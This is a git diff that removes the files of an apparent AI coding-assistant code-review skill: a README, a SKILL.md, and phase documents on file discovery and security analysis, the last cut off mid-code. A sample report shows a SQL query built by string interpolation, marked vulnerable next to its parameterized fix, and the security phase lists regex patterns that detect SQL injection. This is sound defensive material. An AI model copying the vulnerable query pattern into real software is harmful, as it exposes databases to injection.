||||
| Input | Classification | Workflow |
|
||||
|-------|----------------|----------|
|
||||
| "用户登录失败,401错误" | bugfix/standard | lite-fix |
|
||||
| "紧急:支付网关挂了" | bugfix/hotfix | lite-fix --hotfix |
|
||||
| "批量处理这些 GitHub issues" | issue | issue:plan → queue |
|
||||
| "不确定要怎么设计缓存系统" | exploration | brainstorm → plan |
|
||||
| "添加一个深色模式切换按钮" | ui | ui-design → plan |
|
||||
| "重构整个认证模块" | feature/high | plan → verify |
|
||||
| "添加用户头像功能" | feature/low | lite-plan |
|
||||
@@ -1,340 +0,0 @@
|
||||
# Code Reviewer Skill
|
||||
|
||||
A comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Overview
|
||||
|
||||
The **code-reviewer** skill provides automated code review capabilities covering:
|
||||
- **Security Analysis**: OWASP Top 10, CWE Top 25, language-specific vulnerabilities
|
||||
- **Code Quality**: Naming conventions, complexity, duplication, dead code
|
||||
- **Performance**: N+1 queries, inefficient algorithms, memory leaks
|
||||
- **Maintainability**: Documentation, test coverage, dependency health
|
||||
|
||||
## Quick Start
|
||||
|
||||
### Basic Usage
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
✅ **OWASP Top 10 2021 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, XSS)
|
||||
- Authentication & authorization flaws
|
||||
- Sensitive data exposure
|
||||
- Security misconfiguration
|
||||
- And more...
|
||||
|
||||
✅ **CWE Top 25 Coverage**
|
||||
- Cross-site scripting (CWE-79)
|
||||
- SQL injection (CWE-89)
|
||||
- Command injection (CWE-78)
|
||||
- Input validation (CWE-20)
|
||||
- And more...
|
||||
|
||||
✅ **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, XXE
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
✅ **Code Quality**
|
||||
- Naming convention compliance
|
||||
- Cyclomatic complexity analysis
|
||||
- Code duplication detection
|
||||
- Dead code identification
|
||||
|
||||
✅ **Performance**
|
||||
- N+1 query detection
|
||||
- Inefficient algorithm patterns
|
||||
- Memory leak detection
|
||||
- Resource cleanup verification
|
||||
|
||||
✅ **Maintainability**
|
||||
- Documentation coverage
|
||||
- Test coverage analysis
|
||||
- Dependency health check
|
||||
- Error handling review
|
||||
|
||||
## Output
|
||||
|
||||
The skill generates comprehensive reports in `.code-review/` directory:
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory with metadata
|
||||
├── security-findings.json # Security vulnerabilities
|
||||
├── best-practices-findings.json # Best practices violations
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Comprehensive markdown report
|
||||
└── FIX-CHECKLIST.md # Actionable fix checklist
|
||||
```
|
||||
|
||||
### Report Contents
|
||||
|
||||
**REPORT.md** includes:
|
||||
- Executive summary with risk assessment
|
||||
- Quality scores (Security, Code Quality, Performance, Maintainability)
|
||||
- Detailed findings organized by severity
|
||||
- Code examples with fix recommendations
|
||||
- Action plan prioritized by urgency
|
||||
- Compliance status (PCI DSS, HIPAA, GDPR, SOC 2)
|
||||
|
||||
**FIX-CHECKLIST.md** provides:
|
||||
- Checklist format for tracking fixes
|
||||
- Organized by severity (Critical → Low)
|
||||
- Effort estimates for each issue
|
||||
- Priority assignments
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Workflow
|
||||
|
||||
### Phase 1: Code Discovery
|
||||
- Discover and categorize code files
|
||||
- Extract metadata (LOC, complexity, framework)
|
||||
- Prioritize files (Critical, High, Medium, Low)
|
||||
|
||||
### Phase 2: Security Analysis
|
||||
- Scan for OWASP Top 10 vulnerabilities
|
||||
- Check CWE Top 25 weaknesses
|
||||
- Apply language-specific security patterns
|
||||
- Generate security findings
|
||||
|
||||
### Phase 3: Best Practices Review
|
||||
- Analyze code quality issues
|
||||
- Detect performance problems
|
||||
- Assess maintainability concerns
|
||||
- Generate best practices findings
|
||||
|
||||
### Phase 4: Report Generation
|
||||
- Consolidate all findings
|
||||
- Calculate quality scores
|
||||
- Generate comprehensive reports
|
||||
- Create actionable checklists
|
||||
|
||||
## Integration
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
Block commits with critical/high issues:
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
**Output**: Security findings with OWASP/CWE mappings and fix recommendations
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
**Output**: N+1 queries, inefficient algorithms, memory leak detections
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
**Output**: Complete audit with all findings, scores, and action plan
|
||||
|
||||
## Compliance Support
|
||||
|
||||
The skill maps findings to compliance requirements:
|
||||
|
||||
- **PCI DSS**: Requirement 6.5 (Common coding vulnerabilities)
|
||||
- **HIPAA**: Technical safeguards and access controls
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
- **SOC 2**: Security controls and monitoring
|
||||
|
||||
## Architecture
|
||||
|
||||
### Execution Mode
|
||||
**Sequential** - Fixed phase order for systematic review:
|
||||
1. Code Discovery → 2. Security Analysis → 3. Best Practices → 4. Report Generation
|
||||
|
||||
### Tools Used
|
||||
- `mcp__ace-tool__search_context` - Semantic code search
|
||||
- `mcp__ccw-tools__smart_search` - Pattern matching
|
||||
- `Read` - File content access
|
||||
- `Write` - Report generation
|
||||
|
||||
## Quality Standards
|
||||
|
||||
### Scoring System
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
```
|
||||
|
||||
### Score Ranges
|
||||
- **A (90-100)**: Excellent - Production ready
|
||||
- **B (80-89)**: Good - Minor improvements needed
|
||||
- **C (70-79)**: Acceptable - Some issues to address
|
||||
- **D (60-69)**: Poor - Significant improvements required
|
||||
- **F (0-59)**: Failing - Major issues, not production ready
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
.claude/skills/code-reviewer/
|
||||
├── SKILL.md # Main skill documentation
|
||||
├── README.md # This file
|
||||
├── phases/
|
||||
│ ├── 01-code-discovery.md
|
||||
│ ├── 02-security-analysis.md
|
||||
│ ├── 03-best-practices-review.md
|
||||
│ └── 04-report-generation.md
|
||||
├── specs/
|
||||
│ ├── security-requirements.md
|
||||
│ ├── best-practices-requirements.md
|
||||
│ └── quality-standards.md
|
||||
└── templates/
|
||||
├── security-finding.md
|
||||
├── best-practice-finding.md
|
||||
└── report-template.md
|
||||
```
|
||||
|
||||
## Version
|
||||
|
||||
**v1.0.0** - Initial release
|
||||
|
||||
## License
|
||||
|
||||
MIT License
|
||||
@@ -1,308 +0,0 @@
|
||||
---
|
||||
name: code-reviewer
|
||||
description: Comprehensive code review skill for identifying security vulnerabilities and best practices violations. Triggers on "code review", "review code", "security audit", "代码审查".
|
||||
allowed-tools: Read, Glob, Grep, mcp__ace-tool__search_context, mcp__ccw-tools__smart_search
|
||||
---
|
||||
|
||||
# Code Reviewer
|
||||
|
||||
Comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Code Reviewer Workflow │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Code Discovery → 发现待审查的代码文件 │
|
||||
│ & Scoping - 根据语言/框架识别文件 │
|
||||
│ ↓ - 设置审查范围和优先级 │
|
||||
│ │
|
||||
│ Phase 2: Security → 安全漏洞扫描 │
|
||||
│ Analysis - OWASP Top 10 检查 │
|
||||
│ ↓ - 常见漏洞模式识别 │
|
||||
│ - 敏感数据泄露检查 │
|
||||
│ │
|
||||
│ Phase 3: Best Practices → 最佳实践审查 │
|
||||
│ Review - 代码质量检查 │
|
||||
│ ↓ - 性能优化建议 │
|
||||
│ - 可维护性评估 │
|
||||
│ │
|
||||
│ Phase 4: Report → 生成审查报告 │
|
||||
│ Generation - 按严重程度分类问题 │
|
||||
│ - 提供修复建议和示例 │
|
||||
│ - 生成可追踪的修复清单 │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
- **OWASP Top 10 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, LDAP)
|
||||
- Authentication & authorization bypass
|
||||
- Sensitive data exposure
|
||||
- XML External Entities (XXE)
|
||||
- Broken access control
|
||||
- Security misconfiguration
|
||||
- Cross-Site Scripting (XSS)
|
||||
- Insecure deserialization
|
||||
- Components with known vulnerabilities
|
||||
- Insufficient logging & monitoring
|
||||
|
||||
- **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, path traversal
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
- **Code Quality**
|
||||
- Naming conventions
|
||||
- Function complexity (cyclomatic complexity)
|
||||
- Code duplication
|
||||
- Dead code detection
|
||||
|
||||
- **Performance**
|
||||
- N+1 queries
|
||||
- Inefficient algorithms
|
||||
- Memory leaks
|
||||
- Resource cleanup
|
||||
|
||||
- **Maintainability**
|
||||
- Documentation quality
|
||||
- Test coverage
|
||||
- Error handling patterns
|
||||
- Dependency management
|
||||
|
||||
## Usage
|
||||
|
||||
### Basic Review
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report with code snippets
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Review Report Structure
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
## Executive Summary
|
||||
- Total Issues: 42
|
||||
- Critical: 3
|
||||
- High: 8
|
||||
- Medium: 15
|
||||
- Low: 16
|
||||
|
||||
## Security Findings
|
||||
|
||||
### [CRITICAL] SQL Injection in User Query
|
||||
**File**: src/auth/user-service.ts:145
|
||||
**Issue**: Unsanitized user input in SQL query
|
||||
**Fix**: Use parameterized queries
|
||||
|
||||
Code Snippet:
|
||||
\`\`\`typescript
|
||||
// ❌ Vulnerable
|
||||
const query = `SELECT * FROM users WHERE username = '${username}'`;
|
||||
|
||||
// ✅ Fixed
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
db.execute(query, [username]);
|
||||
\`\`\`
|
||||
|
||||
## Best Practices Findings
|
||||
|
||||
### [MEDIUM] High Cyclomatic Complexity
|
||||
**File**: src/utils/validator.ts:78
|
||||
**Issue**: Function has complexity score of 15 (threshold: 10)
|
||||
**Fix**: Break into smaller functions
|
||||
|
||||
...
|
||||
```
|
||||
|
||||
## Phase Documentation
|
||||
|
||||
| Phase | Description | Output |
|
||||
|-------|-------------|--------|
|
||||
| [01-code-discovery.md](phases/01-code-discovery.md) | Discover and categorize code files | File inventory with metadata |
|
||||
| [02-security-analysis.md](phases/02-security-analysis.md) | Analyze security vulnerabilities | Security findings list |
|
||||
| [03-best-practices-review.md](phases/03-best-practices-review.md) | Review code quality and practices | Best practices findings |
|
||||
| [04-report-generation.md](phases/04-report-generation.md) | Generate comprehensive report | Markdown report |
|
||||
|
||||
## Specifications
|
||||
|
||||
- [specs/security-requirements.md](specs/security-requirements.md) - Security check specifications
|
||||
- [specs/best-practices-requirements.md](specs/best-practices-requirements.md) - Best practices standards
|
||||
- [specs/quality-standards.md](specs/quality-standards.md) - Overall quality standards
|
||||
- [specs/severity-classification.md](specs/severity-classification.md) - Issue severity criteria
|
||||
|
||||
## Templates
|
||||
|
||||
- [templates/security-finding.md](templates/security-finding.md) - Security finding template
|
||||
- [templates/best-practice-finding.md](templates/best-practice-finding.md) - Best practice finding template
|
||||
- [templates/report-template.md](templates/report-template.md) - Final report template
|
||||
|
||||
## Integration with Development Workflow
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
# Run code review on staged files
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Roadmap
|
||||
|
||||
- [ ] AI-powered vulnerability detection
|
||||
- [ ] Integration with popular security scanners (Snyk, SonarQube)
|
||||
- [ ] Automated fix suggestions with diffs
|
||||
- [ ] IDE plugins for real-time feedback
|
||||
- [ ] Custom rule engine for organization-specific policies
|
||||
|
||||
## License
|
||||
|
||||
MIT License - See LICENSE file for details
|
||||
@@ -1,246 +0,0 @@
|
||||
# Phase 1: Code Discovery & Scoping
|
||||
|
||||
## Objective
|
||||
|
||||
Discover and categorize all code files within the specified scope, preparing them for security analysis and best practices review.
|
||||
|
||||
## Input
|
||||
|
||||
- **User Arguments**:
|
||||
- `--scope`: Directory or file patterns (default: entire project)
|
||||
- `--languages`: Specific languages to review (e.g., typescript, python, java)
|
||||
- `--exclude`: Patterns to exclude (e.g., test files, node_modules)
|
||||
|
||||
- **Configuration**: `.code-reviewer.json` (if exists)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Configuration
|
||||
|
||||
```javascript
|
||||
// Check for project-level configuration
|
||||
const configPath = path.join(projectRoot, '.code-reviewer.json');
|
||||
const config = fileExists(configPath)
|
||||
? JSON.parse(readFile(configPath))
|
||||
: getDefaultConfig();
|
||||
|
||||
// Merge user arguments with config
|
||||
const scope = args.scope || config.scope.include;
|
||||
const exclude = args.exclude || config.scope.exclude;
|
||||
const languages = args.languages || config.languages || 'auto';
|
||||
```
|
||||
|
||||
### Step 2: Discover Files
|
||||
|
||||
Use MCP tools for efficient file discovery:
|
||||
|
||||
```javascript
|
||||
// Use smart_search for file discovery
|
||||
const files = await mcp__ccw_tools__smart_search({
|
||||
action: "find_files",
|
||||
pattern: scope,
|
||||
includeHidden: false
|
||||
});
|
||||
|
||||
// Apply exclusion patterns
|
||||
const filteredFiles = files.filter(file => {
|
||||
return !exclude.some(pattern => minimatch(file, pattern));
|
||||
});
|
||||
```
|
||||
|
||||
### Step 3: Categorize Files
|
||||
|
||||
Categorize files by:
|
||||
- **Language/Framework**: TypeScript, Python, Java, Go, etc.
|
||||
- **File Type**: Source, config, test, build
|
||||
- **Priority**: Critical (auth, payment), High (API), Medium (utils), Low (docs)
|
||||
|
||||
```javascript
|
||||
const inventory = {
|
||||
critical: {
|
||||
auth: ['src/auth/login.ts', 'src/auth/jwt.ts'],
|
||||
payment: ['src/payment/stripe.ts'],
|
||||
},
|
||||
high: {
|
||||
api: ['src/api/users.ts', 'src/api/orders.ts'],
|
||||
database: ['src/db/queries.ts'],
|
||||
},
|
||||
medium: {
|
||||
utils: ['src/utils/validator.ts'],
|
||||
services: ['src/services/*.ts'],
|
||||
},
|
||||
low: {
|
||||
types: ['src/types/*.ts'],
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 4: Extract Metadata
|
||||
|
||||
For each file, extract:
|
||||
- **Lines of Code (LOC)**
|
||||
- **Complexity Indicators**: Function count, class count
|
||||
- **Dependencies**: Import statements
|
||||
- **Framework Detection**: Express, React, Django, etc.
|
||||
|
||||
```javascript
|
||||
const metadata = files.map(file => ({
|
||||
path: file,
|
||||
language: detectLanguage(file),
|
||||
loc: countLines(file),
|
||||
complexity: estimateComplexity(file),
|
||||
framework: detectFramework(file),
|
||||
priority: categorizePriority(file)
|
||||
}));
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### File Inventory
|
||||
|
||||
Save to `.code-review/inventory.json`:
|
||||
|
||||
```json
|
||||
{
|
||||
"scan_date": "2024-01-15T10:30:00Z",
|
||||
"total_files": 247,
|
||||
"by_language": {
|
||||
"typescript": 185,
|
||||
"python": 42,
|
||||
"javascript": 15,
|
||||
"go": 5
|
||||
},
|
||||
"by_priority": {
|
||||
"critical": 12,
|
||||
"high": 45,
|
||||
"medium": 120,
|
||||
"low": 70
|
||||
},
|
||||
"files": [
|
||||
{
|
||||
"path": "src/auth/login.ts",
|
||||
"language": "typescript",
|
||||
"loc": 245,
|
||||
"functions": 8,
|
||||
"classes": 2,
|
||||
"priority": "critical",
|
||||
"framework": "express",
|
||||
"dependencies": ["bcrypt", "jsonwebtoken", "express"]
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Summary Report
|
||||
|
||||
```markdown
|
||||
## Code Discovery Summary
|
||||
|
||||
**Scope**: src/**/*
|
||||
**Total Files**: 247
|
||||
**Languages**: TypeScript (75%), Python (17%), JavaScript (6%), Go (2%)
|
||||
|
||||
### Priority Distribution
|
||||
- Critical: 12 files (authentication, payment processing)
|
||||
- High: 45 files (API endpoints, database queries)
|
||||
- Medium: 120 files (utilities, services)
|
||||
- Low: 70 files (types, configs)
|
||||
|
||||
### Key Areas Identified
|
||||
1. **Authentication Module** (src/auth/) - 12 files, 2,400 LOC
|
||||
2. **Payment Processing** (src/payment/) - 5 files, 1,200 LOC
|
||||
3. **API Layer** (src/api/) - 35 files, 5,600 LOC
|
||||
4. **Database Layer** (src/db/) - 8 files, 1,800 LOC
|
||||
|
||||
**Next Phase**: Security Analysis on Critical + High priority files
|
||||
```
|
||||
|
||||
## State Management
|
||||
|
||||
Save phase state for potential resume:
|
||||
|
||||
```json
|
||||
{
|
||||
"phase": "01-code-discovery",
|
||||
"status": "completed",
|
||||
"timestamp": "2024-01-15T10:35:00Z",
|
||||
"output": {
|
||||
"inventory_path": ".code-review/inventory.json",
|
||||
"total_files": 247,
|
||||
"critical_files": 12,
|
||||
"high_files": 45
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Agent Instructions
|
||||
|
||||
```markdown
|
||||
You are in Phase 1 of the Code Review workflow. Your task is to discover and categorize code files.
|
||||
|
||||
**Instructions**:
|
||||
1. Use mcp__ccw_tools__smart_search with action="find_files" to discover files
|
||||
2. Apply exclusion patterns from config or arguments
|
||||
3. Categorize files by language, type, and priority
|
||||
4. Extract basic metadata (LOC, complexity indicators)
|
||||
5. Save inventory to .code-review/inventory.json
|
||||
6. Generate summary report
|
||||
7. Proceed to Phase 2 with critical + high priority files
|
||||
|
||||
**Tools Available**:
|
||||
- mcp__ccw_tools__smart_search (file discovery)
|
||||
- Read (read configuration and sample files)
|
||||
- Write (save inventory and reports)
|
||||
|
||||
**Output Requirements**:
|
||||
- inventory.json with complete file list and metadata
|
||||
- Summary markdown report
|
||||
- State file for phase tracking
|
||||
```
|
||||
|
||||
## Error Handling
|
||||
|
||||
### No Files Found
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length === 0) {
|
||||
throw new Error(`No files found matching scope: ${scope}
|
||||
|
||||
Suggestions:
|
||||
- Check if scope pattern is correct
|
||||
- Verify exclude patterns are not too broad
|
||||
- Ensure project has code files in specified scope
|
||||
`);
|
||||
}
|
||||
```
|
||||
|
||||
### Large Codebase
|
||||
|
||||
```javascript
|
||||
if (filteredFiles.length > 1000) {
|
||||
console.warn(`⚠️ Large codebase detected (${filteredFiles.length} files)`);
|
||||
console.log(`Consider using --scope to review in batches`);
|
||||
|
||||
// Offer to focus on critical/high priority only
|
||||
const answer = await askUser("Review critical/high priority files only?");
|
||||
if (answer === 'yes') {
|
||||
filteredFiles = filteredFiles.filter(f =>
|
||||
f.priority === 'critical' || f.priority === 'high'
|
||||
);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Validation
|
||||
|
||||
Before proceeding to Phase 2:
|
||||
|
||||
- ✅ Inventory file created
|
||||
- ✅ At least one file categorized as critical or high priority
|
||||
- ✅ Metadata extracted for all files
|
||||
- ✅ Summary report generated
|
||||
- ✅ State saved for resume capability
|
||||
|
||||
## Next Phase
|
||||
|
||||
**Phase 2: Security Analysis** - Analyze critical and high priority files for security vulnerabilities using OWASP Top 10 and CWE Top 25 checks.
|
||||
@@ -1,442 +0,0 @@
|
||||
# Phase 2: Security Analysis
|
||||
|
||||
## Objective
|
||||
|
||||
Analyze code files for security vulnerabilities based on OWASP Top 10, CWE Top 25, and language-specific security patterns.
|
||||
|
||||
## Input
|
||||
|
||||
- **File Inventory**: From Phase 1 (`.code-review/inventory.json`)
|
||||
- **Priority Focus**: Critical and High priority files (unless `--scope all`)
|
||||
- **User Arguments**:
|
||||
- `--focus security`: Security-only mode
|
||||
- `--severity critical,high,medium,low`: Minimum severity to report
|
||||
- `--checks`: Specific security checks to run (e.g., sql-injection, xss)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Security Rules
|
||||
|
||||
```javascript
|
||||
// Load security check definitions
|
||||
const securityRules = {
|
||||
owasp_top_10: [
|
||||
'injection',
|
||||
'broken_authentication',
|
||||
'sensitive_data_exposure',
|
||||
'xxe',
|
||||
'broken_access_control',
|
||||
'security_misconfiguration',
|
||||
'xss',
|
||||
'insecure_deserialization',
|
||||
'vulnerable_components',
|
||||
'insufficient_logging'
|
||||
],
|
||||
cwe_top_25: [
|
||||
'cwe-79', // XSS
|
||||
'cwe-89', // SQL Injection
|
||||
'cwe-20', // Improper Input Validation
|
||||
'cwe-78', // OS Command Injection
|
||||
'cwe-190', // Integer Overflow
|
||||
// ... more CWE checks
|
||||
]
|
||||
};
|
||||
|
||||
// Load language-specific rules
|
||||
const languageRules = {
|
||||
typescript: require('./rules/typescript-security.json'),
|
||||
python: require('./rules/python-security.json'),
|
||||
java: require('./rules/java-security.json'),
|
||||
go: require('./rules/go-security.json'),
|
||||
};
|
||||
```
|
||||
|
||||
### Step 2: Analyze Files for Vulnerabilities
|
||||
|
||||
For each file in the inventory, perform security analysis:
|
||||
|
||||
```javascript
|
||||
const findings = [];
|
||||
|
||||
for (const file of inventory.files) {
|
||||
if (file.priority !== 'critical' && file.priority !== 'high') continue;
|
||||
|
||||
// Read file content
|
||||
const content = await Read({ file_path: file.path });
|
||||
|
||||
// Run security checks
|
||||
const fileFindings = await runSecurityChecks(content, file, {
|
||||
rules: securityRules,
|
||||
languageRules: languageRules[file.language],
|
||||
severity: args.severity || 'medium'
|
||||
});
|
||||
|
||||
findings.push(...fileFindings);
|
||||
}
|
||||
```
|
||||
|
||||
### Step 3: Security Check Patterns
|
||||
|
||||
#### A. Injection Vulnerabilities
|
||||
|
||||
**SQL Injection**:
|
||||
```javascript
|
||||
// Pattern: String concatenation in SQL queries
|
||||
const sqlInjectionPatterns = [
|
||||
/\$\{.*\}.*SELECT/, // Template literal with SELECT
|
||||
/"SELECT.*\+\s*\w+/, // String concatenation
|
||||
/execute\([`'"].*\$\{.*\}.*[`'"]\)/, // Parameterized query bypass
|
||||
/query\(.*\+.*\)/, // Query concatenation
|
||||
];
|
||||
|
||||
// Check code
|
||||
for (const pattern of sqlInjectionPatterns) {
|
||||
const matches = content.matchAll(new RegExp(pattern, 'g'));
|
||||
for (const match of matches) {
|
||||
findings.push({
|
||||
type: 'sql-injection',
|
||||
severity: 'critical',
|
||||
line: getLineNumber(content, match.index),
|
||||
